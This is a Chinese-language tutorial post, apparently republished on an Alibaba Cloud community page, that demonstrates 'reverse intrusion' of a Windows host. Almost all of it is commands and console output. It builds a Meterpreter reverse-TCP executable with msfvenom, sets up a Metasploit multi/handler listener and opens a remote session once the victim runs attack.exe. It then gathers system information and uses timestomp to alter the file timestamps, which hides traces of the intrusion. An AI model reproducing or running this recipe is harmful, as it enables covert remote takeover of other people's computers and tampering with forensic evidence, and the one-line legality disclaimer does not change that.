反彈入侵(幾乎適用於任何windows主機)((請勿用於非法操作!!!))

來源:互聯網
上載者:User

標籤:主機   反彈入侵   

[email protected]:~# msfvenom -pwindows/meterpreter/reverse_tcp lhost=192.168.1.117 lport=1234 --format=exe> /root/attack.exe

No platform was selected, choosingMsf::Module::Platform::Windows from the payload

No Arch selected, selecting Arch: x86 fromthe payload

No encoder or badchars specified,outputting raw payload

Payload size: 333 bytes

Final size of exe file: 73802 bytes

Saved as: /root/attack.exe            (病毒)

[email protected]:~# service postgresql start

[email protected]:~# msfconsole

[email protected]:~# db_status

msf > use exploit/multi/handler

msf exploit(handler) > set payloadwindows/meterpreter/reverse_tcp

msf exploit(handler) > set lhost192.168.1.117                            (kali linux主機)

msf exploit(handler) > set lport 1234

msf exploit(handler) > show options

msf exploit(handler) > exploit -h

msf exploit(handler) > exploit -j z

[*] Exploit running as background job.

 

[*] Started reverse TCP handler on192.168.1.117:1234

msf exploit(handler) > [*] Starting thepayload handler...

開始監聽

windows主機運行attack.exe

msf exploit(handler) > [*] Starting thepayload handler...

[*] Sending stage (957999 bytes) to192.168.1.94

[*] Meterpreter session 1 opened(192.168.1.117:1234 -> 192.168.1.94:58540) at 2017-03-10 00:16:54 -0500    (windows主機運行attack.exe後產生session 1)

msf exploit(handler) > sessions -i

 

Active sessions

===============

 

 Id  Type                   Information              Connection

 --  ----                   -----------              ----------

 1   meterpreter x86/win32  sh-270\sewells @ SH-270  192.168.1.117:1234 -> 192.168.1.94:58540(192.168.1.94)

msf exploit(handler) > sessions -i1               (1是session Id號碼)

meterpreter > pwd                        (成功登陸)

C:\Users\sewells\Desktop

meterpreter > sysinfo

Computer       : SH-270

OS              : Windows 10 (Build 14393).

Architecture    : x64 (Current Process is WOW64)

System Language : zh_CN

Domain          : WORKGROUP

Logged On Users : 1

Meterpreter     : x86/win32

meterpreter > getuid

Server username: sh-270\sewells

meterpreter > timestomp -h            修改入侵時間

meterpreter > timestomp attack.exe -v

Modified      : 2017-03-10 00:01:11 -0500

Accessed      : 2017-03-10 00:03:26 -0500

Created       : 2017-03-10 00:18:07 -0500

Entry Modified: 2017-03-10 00:18:07 -0500


反彈入侵(幾乎適用於任何windows主機)((請勿用於非法操作!!!))

相關文章

聯繫我們

該頁面正文內容均來源於網絡整理,並不代表阿里雲官方的觀點,該頁面所提到的產品和服務也與阿里云無關,如果該頁面內容對您造成了困擾,歡迎寫郵件給我們,收到郵件我們將在5個工作日內處理。

如果您發現本社區中有涉嫌抄襲的內容,歡迎發送郵件至: info-contact@alibabacloud.com 進行舉報並提供相關證據,工作人員會在 5 個工作天內聯絡您,一經查實,本站將立刻刪除涉嫌侵權內容。

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.